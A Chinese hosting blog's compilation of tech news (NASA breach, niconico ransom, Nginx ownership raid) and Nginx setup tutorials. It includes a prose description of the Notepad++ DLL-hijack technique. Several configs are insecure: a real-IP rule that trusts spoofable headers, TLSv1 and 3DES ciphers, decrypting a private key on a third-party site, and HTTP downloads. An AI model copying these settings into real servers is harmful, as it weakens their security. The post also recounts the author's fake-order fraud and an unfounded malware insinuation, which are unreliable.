虽然对于大多数WordPress网站来说,百万美元的预算可能显得过高,但对于NASA这样的国家级机构,这样的投资可能是必要的,以确保网站能够满足其特定的技术和安全要求。此外,这样的项目往往不仅仅是建立一个简单的网站,而是一个涉及复杂数据和大量用户交互的综合性平台。 #### NASA服务器被黑客攻击 员工信息曝光 美国国家航空航天局(NASA)已确认旗下一台服务器在 10 月被黑客攻击,黑客从其中盗取了一些员工信息,包括社会安全号码等等。在 12 月 18 日发布的通知中,美国国家航空航天局表示,它目前正在通知那些可能因此受到损害的员工。调查已经开始,NASA表示社会安全号码和其他个人身份信息存储在被黑的服务器上。NASA表示,在发现这些事件后,NASA网络安全人员立即采取行动保护服务器及其中包含的数据。美国宇航局及其联邦网络安全合作伙伴正在继续检查服务器,以确定潜在数据泄漏的范围,并识别可能受影响的个人。NASA表示,调查需要时间,但强调它现在已成为NASA目前最重要的优先事项。该机构声称没有任何迹象表明NASA的各项任务受到了黑客影响,但现在它已经传达给所有员工,让他们知道某些信息已经暴露给黑客。NASA表示,将为所有员工提供额外服务,包括身份保护服务。但是NASA没有详细说明服务器是如何被破坏的,以及事件背后的黑客组织名称。 #### NEC 亚洲海底光缆竣工,可让中国互联网访问东南亚国家速度更快 12 月 20 日消息,NEC 日电昨日发布新闻稿,宣布其横跨约 10000 公里,连接中国、日本、菲律宾、新加坡、泰国和越南等国家的 ADC 海底光缆已完成铺设并交付。 据官方介绍,该项目由 ADC 联盟(注:包括中国电信、中国联通、软银、塔塔通信、越南 Viettel、新加坡电信、菲律宾长途电话公司 PLDT、泰国 NT)所有,从 12 月 19 日正式开始运营。 ▲ ADC 海底电缆开通仪式,图源:NEC NEC 表示,该公司已建造了超过 40 万公里的电缆,横跨地球近 10 圈,在海底电缆市场位居世界前三,尤其在亚洲及太平洋地区具有显著优势;而这条海底电缆由其子公司 OCC 负责制造。 这条光缆采用最新的大容量传输技术,可确保每秒 160TB 的通信容量。这是时隔约 8 年新设连接日本和新加坡的基础系。该企业联合体有中国电信及菲律宾 PLDT 等亚太地区的 8 家通信公司和 IT 企业加盟。已从 12 月 19 日开始运营这条海底光缆,该电缆的建成,可让国内访问东南亚延迟更低,更快,更稳定。 #### net域名太贵?Discuz!把.net域名更换成了VIP域名 近日,国内知名开源论坛程序Discuz!把原先域名www.discuz.net更换成了www.discuz.vip了。 Discuz!被腾讯收购后就一直没怎么管,后来有团队接手后,运营得有模有样的,不过论坛现在已经不吃香了,你甚至在搜索引擎上,很难搜到论坛的内容。 本次把net域名换了,在主机吧看来,net域名确实没什么用,又废又贵,续费高达88元一年,据说以后可能还要涨价,简直离谱,主机吧强烈建议大家不要注册NET域名。 #### Nginx linux服务器如何安装国密 SM2 SSL 证书 一、获取国密证书 1、在您完成申请西部GDCA服务器证书的流程后,下载证书将获取一个证书包,有以下 *.***.com_sign.crt:签名证书 *.***.com_sign.key:签名证书私钥 *.***.com_encrypt.crt:加密证书 *.***.com_encryptKeyData.txt:内容为已加密的加密证书私钥片段 2、加密证书解密 在线解密:https://myssl.com/key_encryption_decryption.html#tc_cert 创建 *.**.com_encrypt.key 文件,将获取的解密后 解密证书私钥 内容填写进去。 二、部署国密nginx 国密OpenSSL与国密Nginx gmssl_openssl_1.1_bxx.tar.gz 无缝nginx国密改造,支持nginx1.6+ 编译部署(以nginx-1.18.0为例) 1) 下载 wget http://download.myhostadmin.net/gmssl/gmssl_openssl_1.1_b8.tar.gz到/root/下2) 解压 tar xzfm gmssl_openssl_1.1_b8.tar.gz -C /usr/local3) 下载wget http://download.myhostadmin.net/gmssl/nginx-1.18.0.zip 到/root/下4) 解压 unzip nginx-1.18.0.zip 注:可能需要使用yum install pcre-devel需要安装pcre-devel 5) 进入目录 cd /root/nginx-1.18.0 6) 编译配置 ./configure \--without-http_gzip_module \--with-http_ssl_module \--with-http_stub_status_module \--with-http_v2_module \--with-file-aio \--with-openssl="/usr/local/gmssl" \--with-cc-opt="-I/usr/local/gmssl/include" \--with-ld-opt="-lm" 7) 编译安装make install8) /usr/local/nginx即为生成的nginx目录 9)编译安装完成后,cd 进入/usr/local/nginx/sbin 目录,用 ./nginx -t 命令检测是否正常,如下: 配置示例(国密单向) *.***.com_sign.crt:签名证书 *.***.com_sign.key:签名证书私钥 *.***.com_encrypt.crt:加密证书 *.***.com_encrypt.key : 加密证书私钥 server{  listen 0.0.0.0:443 ssl;  ssl_protocols TLSv1 TLSv1.1 TLSv1.2;  ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:AES128-SHA:DES-CBC3-SHA:ECC-SM4-CBC-SM3:ECC-SM4-GCM-SM3;  ssl_verify_client off;  ssl_certificate /usr/local/nginx/conf/*.***.com_sign.crt;  ssl_certificate_key /usr/local/nginx/conf/*.***.com_sign.key;  ssl_certificate /usr/local/nginx/conf/*.***.com_encrypt.crt;  ssl_certificate_key /usr/local/nginx/conf/*.***.com_encrypt.key;  location /  {    root html;    index index.html index.htm;  }} 配置示例(国密/RSA单向自适应) server{  listen 0.0.0.0:443 ssl;  ssl_protocols TLSv1 TLSv1.1 TLSv1.2;  ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:AES128-SHA:DES-CBC3-SHA:ECC-SM4-CBC-SM3:ECC-SM4-GCM-SM3;  ssl_verify_client off;  ssl_certificate /usr/local/nginx/conf/*.***.com.crt;  ssl_certificate_key /usr/local/nginx/conf/*.***.com.key;  ssl_certificate /usr/local/nginx/conf/*.***.com_sign.crt;  ssl_certificate_key /usr/local/nginx/conf/*.***.com_sign.key;  ssl_certificate /usr/local/nginx/conf/*.***.com_encrypt.crt;  ssl_certificate_key /usr/local/nginx/conf/*.***.com_encrypt.key;  location /  {    root html;    index index.html index.htm;  }} 测试配置是否正确/usr/local/nginx/sbin/nginx -t 启动/usr/local/nginx/sbin/nginx 三、访问测试 1、360企业浏览器 设置,打开浏览器点击右上角的 #### Nginx 之父被抓 因涉及Nginx 代码所有权 俄罗斯搜索引擎Rambler.ru声称拥有NGINX代码的全部所有权。俄罗斯警方近日突击搜查了F5 Networks子公司NGINX的莫斯科办事处,NGINX公司开发了互联网上最受欢迎的Web服务器技术。警方扣押了相关设备,并拘留了员工进行讯问。Rambler集团之前对NGINX公司提起诉讼、控诉侵犯版权,声称它拥有NGINX Web服务器代码的全部所有权,莫斯科警方随后于上周执行了突击搜查。Rambler集团是rambler.ru的母公司,而rambler.ru是俄罗斯最大的搜索引擎和互联网门户之一。据今天在Twitter上发布的搜查令副本显示,Rambler声称Igor Sysoev在担任该公司的系统管理员期间开发了NGINX,因此他们才是该项目的合法所有者。 Sysoev在2000年代初期开发了NGINX,并在2004年开源了NGINX代码。2009年,他创办了美国公司NGINX公司,为NGINX部署系统提供配套的工具和支持服务。该公司总部位于旧金山,但在世界各地(包括莫斯科)设有办事处。NGINX服务器的源代码仍然是免费的,并通过开放源代码模式加以管理,不过该项目的主要贡献者中很大一部分是NGINX公司的员工,他们牢牢控制着该项目的监管。Sysoev从未否认过自己在Rambler工作期间开发了NGINX。在2012年的一次采访中,Sysoev声称他在业余时间开发了NGINX,而Rambler甚至多年都没有意识到这一点。他称,该服务器最初部署在Rate.ee和zvuki.ru网站上,Rambler只是在一名同事询问NGINX后才开始使用它。2019年2月,NGINX最终取代Apache HTTPD,成为互联网上部署最广泛的服务器。据Netcraft在2019年12月的Web服务器调查显示,NGINX的市场份额高达38%。一个月后的2019年3月,网络安全和网络设备供应商F5 Networks以6.7亿美元的价格收购了NGINX公司。NGINX员工透露Sysoev被捕 NGINX的一名员工在Twitter上发布搜查令的屏幕截图后,有关突袭的消息今天传了开来。后来该员工应俄罗斯警方的要求删除了这条推文。其他员工证实了突袭一事。同一名员工称,在这次突袭活动中,NGINX的两名员工被拘留,其中包括NGINX的开发者、NGINX公司的联合创始人兼现任首席技术官Igor Sysoev,以及联合创始人Maxim Konovalov。F5 Networks的发言人证实了这次突袭活动,不过告诉ZDNet,他们仍在收集事实,目前不发表进一步评论。Rambler集团的发言人未发表评论,声称不精通英文。不过,Rambler集团向两家当地媒体Kommersant和The Bell提供了俄文声明,确认他们的确在12月4日对NGINX提起了侵犯版权的诉讼。Rambler称,它已将对NGINX公司提起版权索赔的合法权益转让给了总部位于塞浦路斯的Lynwood Investments CY Ltd,“后者拥有在权利所有权问题上恢复司法公正的必要能力。”总统候选人Alexei Navalny的办公室主任Leonid Volkov抨击了这次突袭行动和背后的法律诉讼,声称15年后,提出版权侵权主张的诉讼时效已过。 据俄媒消息,Maxim Konovalov和Igor Sysoev经质询后均获释放,但他们的电话被没收。 看到这里我们不禁想,如果Nginx开发团队被抓,那势必会影响Nginx的后续开发,作为目前最受欢迎的web服务器,将会影响很网站。像主机吧博客的主机就是用Nginx的,百度也开发有类似于Nginx的开源web服务器——BFE,不过目前流行度非常少,希望有一天国内开发的web服务器可以成为普及吧。 #### nginx优化的方法 这篇文章主要介绍了nginx优化的六点方法,有对nginx优化不太熟悉的同学可以参考下 一.优化Nginx并发量 [root@proxy ~]# ab -n 2000 -c 2000 http://192.168.4.5/ Benchmarking 192.168.4.5 (be patient) socket: Too many open files (24) //提示打开文件数量过多 修改Nginx配置文件,增加并发量 [root@proxy ~]# vim /usr/local/nginx/conf/nginx.conf .. .. worker_processes 2; //与CPU核心数量一致 events { worker_connections 65535; //每个worker最大并发连接数 use epoll; } .. .. [root@proxy ~]# nginx -s reload 二.优化Linux内核参数(最大文件数量) [root@proxy ~]# ulimit -a //查看所有属性值 [root@proxy ~]# ulimit -Hn 100000 //设置硬限制(临时规则) [root@proxy ~]# ulimit -Sn 100000 //设置软限制(临时规则) [root@proxy ~]# vim /etc/security/limits.conf .. .. * soft nofile 100000 * hard nofile 100000 #该配置文件分4列,分别如下: #用户或组 硬限制或软限制 需要限制的项目 限制的值 优化后测试服务器并发量 [root@proxy ~]# ab -n 2000 -c 2000 http://192.168.4.5/ 三.优化Nginx数据包头缓存 [root@proxy ~]# cat lnmp_soft/buffer.sh #!/bin/bash URL=http://192.168.4.5/index.html? for i in {1..5000} do URL=${URL}v$i=$i done curl $URL //经过5000次循环后,生成一个长的URL地址栏 [root@proxy ~]# ./buffer.sh .. .. <center><h1>414 Request-URI Too Large</h1></center> //提示头部信息过大 修改Nginx配置文件,增加数据包头部缓存大小 [root@proxy ~]# vim /usr/local/nginx/conf/nginx.conf .. .. http { client_header_buffer_size 1k; //默认请求包头信息的缓存 large_client_header_buffers 4 4k; //大请求包头部信息的缓存个数与容量 .. .. } [root@proxy ~]# nginx -s reload 四.对页面进行压缩处理 [root@proxy ~]# cat /usr/local/nginx/conf/nginx.conf http { .. .. gzip on; //开启压缩 gzip_min_length 1000; //小文件不压缩 gzip_comp_level 4; //压缩比率 gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript; //对特定文件压缩,类型参考mime.types .. .. 五.服务器内存缓存 http { open_file_cache max=2000 inactive=20s; open_file_cache_valid 60s; open_file_cache_min_uses 5; open_file_cache_errors off; //设置服务器最大缓存2000个文件句柄,关闭20秒内无请求的文件句柄 //文件句柄的有效时间是60秒,60秒后过期 //只有访问次数超过5次会被缓存 } 六.浏览器本地缓存静态数据 [root@proxy ~]# vim /usr/local/nginx/conf/nginx.conf server { listen 80; server_name localhost; location / { root html; index index.html index.htm; } location ~* \.(jpg|jpeg|gif|png|css|js|ico|xml)$ { expires 30d; //定义客户端缓存时间为30天 } } [root@proxy ~]# cp /usr/share/backgrounds/day.jpg /usr/local/nginx/html [root@proxy ~]# nginx -s reload 到此这篇关于nginx优化方法的文章就介绍到这了,希望可以帮助大家,欢迎关注主机吧了解更多知识。 #### Nginx安装出现错误解决办法 这篇文章主要介绍了Nginx安装出现错误解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 1. 解压缩 nginx-1.8.1.tar.gz 2. 解压缩 fastdfs-nginx-module-master.zip 3. 进入nginx-1.8.1目录中 4. 执行 然后就出现了错误。 解决办法: 1.sudo apt-get update 2.sudo apt-get install libpcre3 libpcre3-dev 3.sudo apt-get install openssl libssl-dev 再次安装: 成功: 可是接下来执行 sudo make install 又出错了: 解决方法: 找到 CFLAGS = -pipe -O -W -Wall -Wpopinter-arith Wno-unused-parameter -Werror -g 然后删除 -Werror 再次sudo make install 安装完成 启动成功 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### nginx开源项目也受俄罗斯制裁影响了 做网站建设的一定会接触过nginx,Nginx是一款非常优秀的Web服务器系统,是由俄罗斯程序员伊戈尔·赛索耶夫为俄罗斯访问量第二的Rambler.ru网站开发的。后成立同名公司提供支持服务。 不过,2019年3月12日,F5 Networks宣布6.7亿美元收购NGINX,F5 Networks是一家总部位于美国的公司。 如今受到制裁的影响,也宣布: 已暂停了在俄罗斯的所有销售活动,并将客户支持工作转移到其他地方。已禁止俄罗斯访问F5网络,并停止了俄罗斯对NGINX开源项目作贡献,这项工作会在全球其他地方继续开展。没有任何代码放在俄罗斯境内,无论是商业代码还是开源代码。除了确保我们在俄罗斯的工作人员的福祉外,我们还仍然致力于NGINX的发展及社区的发展壮大。 NGINX是一个开源项目,目前是全球市场占有率最高Web服务器系统,W3Techs数据显示:排名前三的Web服务器系统是Nginx(34.1%)、Apache(33.2%)和Cloudflare Server(18.7%)。 这样的一个本身是由俄罗斯人开发的系统,现在却反过来屏蔽俄罗斯使用,挺讽刺的。 这件事也告诉我们,自主知识产权的重要性。 #### Nginx服务器下升级https的方法步骤 购买证书 可以去阿里云的云盾证书服务购买 下载证书 在证书控制台下载 Nginx 版本证书。下载到本地的压缩文件包解压后包含: .pem 文件:证书文件 .key 文件:证书的私钥文件(申请证书时如果没有选择 自动创建CSR ,则没有该文件) 配置Nginx 1、在 Nginx 的安装目录下创建 cert 目录,并且将下载的全部文件拷贝到 cert 目录中,如果申请证书时是自己创建的CSR文件,请将对应的私钥文件放到 cert 目录下。 2、打开 Nginx 安装目录下 conf 目录中的 nginx.conf 文件 #user nobody; worker_processes 1; #error_log logs/error.log; #error_log logs/error.log notice; #error_log logs/error.log info; #pid    logs/nginx.pid; events {   worker_connections 1024; } http {   include    mime.types;   default_type application/octet-stream;   #log_format main '$remote_addr - $remote_user [$time_local] "$request" '   #         '$status $body_bytes_sent "$http_referer" '   #         '"$http_user_agent" "$http_x_forwarded_for"';   #access_log logs/access.log main;   sendfile    on;   #tcp_nopush   on;   #keepalive_timeout 0;   keepalive_timeout 65;   gzip on;  #开启gzip   gzip_min_length 1k; #低于1kb的资源不压缩   gzip_comp_level 3; #压缩级别【1-9】,越大压缩率越高,同时消耗cpu资源也越多,建议设置在4左右。   gzip_types text/plain application/javascript application/x-javascript text/javascript text/xml text/css; #需要压缩哪些响应类型的资源,多个空格隔开。不建议压缩图片,下面会讲为什么。   gzip_disable "MSIE [1-6]\."; #配置禁用gzip条件,支持正则。此处表示ie6及以下不启用gzip(因为ie低版本不支持)   gzip_vary on; #是否添加“Vary: Accept-Encoding”响应头   server {     listen    80 default backlog=2048; #配置http可用     listen    443 ssl; #配置https     server_name localhost;     ssl_certificate   ../cert/hzzly.pem; #配置证书文件     ssl_certificate_key ../cert/hzzly.key; #配置私钥文件     ssl_session_cache  shared:SSL:1m;     ssl_session_timeout 5m;     ssl_ciphers HIGH:!aNULL:!MD5;     ssl_prefer_server_ciphers on;     location / {       root  /home/hzzly;       index index.html index.htm;     }     # location ^~ /apis/ {     #   proxy_set_header Host $host;     #   proxy_set_header X-Real-IP $remote_addr;     #   proxy_set_header X-Forwarded-Server $host;     #   # 匹配任何以 /apis/ 开始的请求,并停止匹配 其它location     #   proxy_pass http://xxxxxxxxxx/;     # }     # location ^~ /assets/ {     #   gzip_static on;     #   expires max;     #   add_header Cache-Control public;     # }   } } 3、重启 Nginx $ cd /usr/local/nginx/sbin $ ./nginx -s reload 错误详解 1、Nginx如果未开启SSL模块,配置Https时提示错误 nginx: [emerg] the "ssl" parameter requires ngx_http_ssl_module in ... Nginx开启SSL模块 切换到源码包: nginx: [emerg] the "ssl" parameter requires ngx_http_ssl_module in ... 修改新的configure参数 $ ./configure --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module 配置完成后,运行命令 $ make //这里不要进行make install,否则就是覆盖安装 备份原有已安装好的nginx $ cp /usr/local/nginx/sbin/nginx /usr/local/nginx/sbin/nginx.bak 将刚刚编译好的nginx覆盖掉原有的nginx $ cp ./objs/nginx /usr/local/nginx/sbin/ 重启 Nginx $ cd /usr/local/nginx/sbin $ ./nginx -s reload 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### Nginx服务器拒绝post请求方法 最近发现有些攻击利用post请求绕过百度云加速防火墙的情况 这种情况我们直接禁掉服务器POST请求是不是好些呢,所以主机吧找了个代码放置在nginx.conf文件上,试了下,果然是有效果的,代码如下: upstream tomcat { ip_hash; server 192.168.2.187:8080; } location ~* / { if ($request_method = PUT ) { return 403; } if ($request_method = DELETE ) { return 403; } if ($request_method = POST ) { return 403; } proxy_method GET; proxy_pass http://tomcat; } 当路径包含/的时候,则代理到server后端进行请求数据。这里屏蔽了PUT,DELETE,POST方法,只是使用了GET。 #### Nginx服务器接入百度云加速CDN后如何获取真实访客IP? 默认情况下,开启百度云加速CDN后,网站日志的请求IP只会显示 百度CDN的代理节点。 但有些站长是需要查看访客真实IP,所以今天主机吧来教大家如何获取真实用户IP。 百度云加速转发的HTTP头信息中增加 X-Forwarded-For 信息,用于记录客户端的真实IP,所以我们只要修改服务器配置就行, nginx获取真实IP的方法:原理:使用Nginx自带的Realip模块获取用户真实IP修改nginx配置:http{}中添加如下: set_real_ip_from 0.0.0.0/0;  real_ip_header X-Forwarded-For; 然生重载 Nginx 配置完成! 测试访问网站后,查看日志,已显示主机吧的真实IP,就是这么简单! #### Nginx服务器配置SSL自签名证书的方法 这篇文章主要介绍了Nginx配置SSL自签名证书的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧生成自签名SSL证书生成RSA密钥(过程需要设置一个密码,记住这个密码) $ openssl genrsa -des3 -out domain.key 1024拷贝一个不需要输入密码的密钥文件$ openssl rsa -in domain.key -out domain_nopass.key生成一个证书请求$ openssl req -new -key domain.key -out domain.csr这里会提示输入国家,地区组织,email等信息.最重要的一个是"common name",需要与网站域名相同.Enter pass phrase for domain.key:              # 之前设置的密码-----Country Name (2 letter code) [XX]:CN            # 国家State or Province Name (full name) []:Jilin         # 地区或省份Locality Name (eg, city) [Default City]:Changchun      # 地区局部名Organization Name (eg, company) [Default Company Ltd]:Python # 机构名称Organizational Unit Name (eg, section) []:Python      # 组织单位名称Common Name (eg, your name or your server's hostname) []:domain.com # 网站域名Email Address []:123@domain.com               # 邮箱A challenge password []:                  # 私钥保护密码,可直接回车An optional company name []:                # 一个可选公司名称,可直接回车输入完这些就会生成一个domain.csr文件,提交给ssl提供商的时候就是这个csr文件.当然这里并没有向任何证书提供商申请,而是自己签发证书.使用上面的密钥和CSR对证书签名$ openssl x509 -req -days 365 -in domain.csr -signkey domain.key -out domain.crtNginx下ssl配置方法检测nginx是否支持SSL:$ nginx -V如果有显示-with-http_ssl_module表示已编译openssl,支持安装ssl.如果没有,请重新编译安装nginx$ ./ configure --with-http_ssl_module --with-http_stub_status_module $ make & make install配置文件:server {  listen 80;  listen 443 ssl;        # 监听443端口, 开启ssl(必须)  server_name domain.com;     # ssl on;   # 不建议使用! 该指令与listen中ssl参数功能相同.  # 引用ssl证书(必须,如果放在nginx/conf/ssl下可以用相对路径,其他位置必须用绝对路径)  ssl_certificate   /home/user/domain.com/conf/ssl/domain.crt;  ssl_certificate_key /home/user/domain.com/conf/ssl/domain_nopass.key;   # 协议优化(可选,优化https协议,增强安全性)  ssl_protocols    TLSv1 TLSv1.1 TLSv1.2  ssl_ciphers     ECDHE-RSA-AES128-GCM-SHA256:HIGH:!aNULL:!MD5:!RC4:!DHE;  ssl_prefer_server_ciphers on;  ssl_session_cache  shared:SSL:10m;  ssl_session_timeout 10m;   # 自动跳转到HTTPS  if ($server_port = 80) {    rewrite ^(.*)$ https://$host$1 permanent;  }   # 其他配置信息...}配置完成后检查niginx配置文件是否可用:$ nginx -t # 检查nginx配置文件successful后重新加载配置文件使配置生效:$ nginx -s reload注:记得开启防火墙的443端口 firewall-cmd --zone=public --add_port=443/tcp permanent注:我使用的nginx+uwsgi部署,这种情况还需要重启下uwsgi,否则无法访问 uwsgi --reload ./tmp/uwsgi.pid以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。 #### Nginx配置之实现多台服务器负载均衡方法 这篇文章主要介绍了Nginx配置之实现多台服务器负载均衡,本篇文章通过简要的案例,讲解了该项技术的了解与使用,以下就是详细内容,需要的朋友可以参考下 Nginx负载均衡服务器: IP:192.168.0.4(Nginx-Server) Web服务器列表: Web1: 192.168.0.5(Nginx-Node1/Nginx-Web1) Web2:192.168.0.7(Nginx-Node2/Nginx-Web2) 实现目的:用户访问Nginx-Server时,通过Nginx负载均衡到Web1和Web2服务器。 Nginx负载均衡服务器的nginx.conf 配置注释如下: events { use epoll; worker_connections 65535; } http { ##upstream的负载均衡,四种调度算法## #调度算法1:轮询.每个请求按时间顺序逐一分配到不同的后端服务器, #如果后端某台服务器宕机,故障系统被自动剔除,使用户访问不受影响 upstream webhost { server 192.168.0.5:6666 ; server 192.168.0.7:6666 ; } #调度算法2:weight(权重).可以根据机器配置定义权重.权重越高被分配到的几率越大 upstream webhost { server 192.168.0.5:6666 weight=2; server 192.168.0.7:6666 weight=3; } #调度算法3:ip_hash. 每个请求按访问IP的hash结果分配,这样来自同一个IP的访客固定访问一个后端服务器, #有效解决了动态网页存在的session共享问题 upstream webhost { ip_hash; server 192.168.0.5:6666 ; server 192.168.0.7:6666 ; } #调度算法4:url_hash(需安装第三方插件).此方法按访问url的hash结果来分配请求, #使每个url定向到同一个后端服务器,可以进一步提高后端缓存服务器的效率. #Nginx本身是不支持url_hash的,如果需要使用这种调度算法,必须安装Nginx 的hash软件包 upstream webhost { server 192.168.0.5:6666 ; server 192.168.0.7:6666 ; hash $request_uri; } #调度算法5:fair(需安装第三方插件).这是比上面两个更加智能的负载均衡算法. #此种算法可以依据页面大小和加载时间长短智能地进行负载均衡,也就是根据后端服务器的响应时间来分配请求, #响应时间短的优先分配.Nginx本身是不支持fair的,如果需要使用这种调度算法,必须下载Nginx的upstream_fair模块 #虚拟主机的配置(采用调度算法3:ip_hash) server { listen 80; server_name mongo.demo.com; #对 “/” 启用反向代理 location / { proxy_pass http://webhost; proxy_redirect off; proxy_set_header X-Real-IP $remote_addr; #后端的Web服务器可以通过X-Forwarded-For获取用户真实IP proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; #以下是一些反向代理的配置,可选. proxy_set_header Host $host; client_max_body_size 10m; #允许客户端请求的最大单文件字节数 client_body_buffer_size 128k; #缓冲区代理缓冲用户端请求的最大字节数, proxy_connect_timeout 90; #nginx跟后端服务器连接超时时间(代理连接超时) proxy_send_timeout 90; #后端服务器数据回传时间(代理发送超时) proxy_read_timeout 90; #连接成功后,后端服务器响应时间(代理接收超时) proxy_buffer_size 4k; #设置代理服务器(nginx)保存用户头信息的缓冲区大小 proxy_buffers 4 32k; #proxy_buffers缓冲区,网页平均在32k以下的设置 proxy_busy_buffers_size 64k; #高负荷下缓冲大小(proxy_buffers*2) proxy_temp_file_write_size 64k; #设定缓存文件夹大小,大于这个值,将从upstream服务器传 } } } 配置 192.168.0.4(Nginx-Server) 创建文件夹准备存放配置文件 $ mkdir -p /opt/confs $ vim /opt/confs/nginx.conf events { use epoll; worker_connections 65535; } http { upstream webhost { ip_hash; server 192.168.0.5:6666 ; server 192.168.0.7:6666 ; } server { listen 80; server_name mongo.demo.com; location / { proxy_pass http://webhost; proxy_redirect off; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header Host $host; client_max_body_size 10m; client_body_buffer_size 128k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; } } } 启动负载均衡服务器192.168.0.4(Nginx-Server) 配置 192.168.0.5(Nginx-Node1/Nginx-Web1) 创建文件夹用于存放web页面 $ mkdir -p /opt/html $ vim /opt/html/index.html 编辑内容如下: The host is 192.168.0.5 - Node 1 启动192.168.0.5(Nginx-Node1/Nginx-Web1) 配置192.168.0.7(Nginx-Node2/Nginx-Web2) 创建文件夹用于存放web页面 $ mkdir -p /opt/html $ vim /opt/html/index.html 编辑内容如下: The host is 192.168.0.7 - Node 2 启动192.168.0.7(Nginx-Node2/Nginx-Web2) 到此这篇关于Nginx配置之实现多台服务器负载均衡的文章就介绍到这了,感谢大家多多支持主机吧! #### niconico 动画弹幕网站遭遇黑客大规模网络攻击 6 月 9 日消息,据动画弹幕网站 niconico 官方 X 平台账号,由于黑客“大规模网络攻击”,niconico 网站服务出现中断问题,官网声称“在本周末内(6 月 10 日之前)没有恢复的希望”。 据悉,niconico 网站自北京时间昨天凌晨 2 时起陆续出现中断问题,而在昨天 5 时起,官网正式暂停服务,除了 niconico 网站外,niconico 背后的运营公司 Dwango 和其母公司 Kadokawa(角川)的网站也出现问题(浏览器无法访问,提示超时),目前官方正在调查原因,暂未披露具体安全报告。 #### niconico 弹幕视频网站黑客攻击事件细节披露,网站负责公司支付 298 万美元赎金 12 月 23 日消息,日本弹幕视频网站 niconico 今年 6 月上旬遭受黑客团体 Black Suit 攻击,黑客团体声称窃取了约 1.5 TB 的内部机密数据。 日本媒体共同通信社(Kyodo News)本月对相关事件进行回顾,证实角川集团向黑客妥协,在黑客事件中支付了赎金。 报道称,有知情人士提供黑客与角川高层之间的电子邮件往来信息,其中显示从 6 月 8 日至 17 日,角川高层栗田穣崇(Shigetaka Kurita)与黑客展开谈判。 6 月 13 日,黑客索要 825 万美元(当前约 6017.9 万元人民币),但栗田在未通知董事会的情况下对黑客表示集团无法支付超过 300 万美元的金额。之后黑客发布通牒,要求角川在 48 小时内支付 298 万美元(当前约 2173.7 万元人民币)。 最终,在 6 月 13 日当天,角川集团将价值 298 万美元的 44 枚虚拟数字货币转入了黑客的虚拟货币钱包。对此,角川集团拒绝进一步评论。 #### Notepad++ 曝出 DLL 劫持漏洞,攻击者可实现任意代码执行(PoC 已公开) 近日,Notepad++ v8.8.3 被披露存在一个 DLL 劫持漏洞,编号为 CVE-2025-56383,其在 CVSS 评估体系中的评分为 6.5 分。攻击者可利用该漏洞劫持 Notepad++ 加载动态链接库的过程,进而执行任意恶意代码。 根据漏洞公告说明:“Notepad++ v8.8.3 中存在 DLL 劫持漏洞,攻击者通过替换原始 DLL 文件即可植入并触发恶意代码。” 漏洞原理分析该漏洞利用 Notepad++ 在运行过程中自动加载特定 DLL 的机制。攻击者只需将可信的 DLL 文件(例如 NppExport.dll)替换为同名恶意 DLL,即可在 Notepad++ 每次启动时自动加载并执行恶意代码。 技术公告进一步解释:“将原始 DLL(例如 Notepad++\plugins\NppExport\NppExport.dll)替换为包含恶意代码的同名 DLL,同时将原始导出函数转发至原 DLL,即可在不影响正常功能的前提下,在 notepad++.exe 启动时激活恶意代码。” 攻击影响评估该漏洞在 Notepad++ 启动时即可被触发,攻击者能够借此在受害主机上实现持久化驻留与恶意代码执行。目前,GitHub 上已公开包含完整攻击链截图的概念验证(PoC)。PoC 展示了伪造的 NppExport.dll 如何在将调用转发至原始 original-NppExport.dll 的同时执行恶意代码,从而在维持软件正常功能的情况下破坏系统安全。 尽管利用此漏洞需要具备本地访问权限,或能够将恶意 DLL 植入 Notepad++ 的安装路径,但它显著增加了权限提升与恶意软件持久化的风险。该漏洞可能被用于供应链攻击、捆绑木马的安装程序,或作为内部威胁的攻击载体。 鉴于 Notepad++ 在开发者、系统管理员及安全从业人员中广泛使用,这一漏洞所带来的潜在攻击面不容忽视。 #### notepad++因辱华事件被封了 之前主机吧就一直推荐使用notepad++,因为确实挺好用的,不过因为去年notepad++官网发布了辱华事件后,notepad++官方虽然还可以访问,但是已经不能在国内下载了。 至于为什么辱华,其实是因为这个软件的作者是一个台湾人,原因自然不用说了。 推荐大家更换别的软件吧,这软件怕是不能用了,谁知道哪天更新会不会给你弄个病毒出来……   #### N年前淘宝刷单被骗的经历 大概在2011年的时候,主机吧开过一家个人淘宝店,当时是卖衣服的,在那个时代,刚开的淘宝店没有信誉是很难有成交量的。 所以主机吧当时就想着作弊吧,找人刷单,不过看到很多网上找刷单的店铺容易被封。 刚好有朋友介绍,说可以找同事、朋友帮刷单,于是就各种找朋友帮刷,一开始还好,久了之后,朋友就那么几个,而且总不能老麻烦别人,所以就没找他们刷了。 在网上看到有人都是在某QQ刷单群找的互刷,抱着试试的心态,就在网上加了一个互刷QQ群。 里面都是一些淘宝店主,他们每天都会找人互刷,简单的说,就是我帮你店铺购买一单,你在我店铺也购买一单,差价就用支付宝转。 就这样主机吧正式加入了互刷行列。不过随后主机吧就遇到了骗子,下面来说下骗子的手段。 1.刷充值类的 骗子会跟你说搜索某某充值,然后让你填写他的手机或者他的虚拟帐号之类的,然后你填写付款后,直接白帮别人充值了,那个店也根本不是他的。 2.刷实物类的 骗子会让你在某某买几百上千块的东西,地址填写他发给你的地址,然后他也帮你刷了相应的钱,等那边物流收到了,骗子就会来申请退款。而那个他所谓的互刷店根本不是他的,这个时候你想申诉也没办法申诉。 3.威胁 对方会拿一个垃圾店铺跟你互刷,双方都互刷了后,对方反手就是一个申请退款,如果你不退款,他就会向淘宝举报,举报你刷单,让你被扣分,而他那个垃圾店根本不怕封。 